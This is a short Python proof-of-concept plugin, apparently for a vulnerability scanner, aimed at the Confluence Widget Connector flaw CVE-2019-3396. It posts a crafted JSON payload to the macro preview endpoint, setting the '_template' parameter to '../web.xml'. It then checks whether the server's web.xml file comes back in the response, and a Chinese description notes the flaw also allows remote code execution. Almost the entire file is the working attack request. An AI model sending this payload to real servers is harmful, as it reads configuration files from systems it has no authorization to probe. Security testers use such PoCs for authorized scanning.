# Author:w7ay
# Refer:https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py
import HackRequests

def poc(arg, **kwargs):
    headers = '''
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Referer: {}/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
    '''.format(arg)
    filename = "../web.xml"
    data = '{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"%s"}}}' % filename
    hh = HackRequests.http(url = arg + "/rest/tinymce/1/macro/preview",post = data,headers = headers)
    if hh.status_code == 200 and "</web-app>" in hh.text():
        desc = '''2019 年 3 月 28 日，Confluence 官方发布预警 ，指出 Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞，攻击 者能利用此漏洞能够实现目录穿越与远程代码执行，同时该漏洞被赋予编号 CVE2019-3396。'''
        result = {
            "name": "Confluence Widget Connector path traversal (CVE-2019-3396)",  # 插件名称
            "content": desc,  # 插件返回内容详情，会造成什么后果。
            "url": arg,  # 漏洞存在url
            "log": hh.log,
            "tag": "path traversal"  # 漏洞标签
        }
        return result


if __name__ == "__main__":
    pass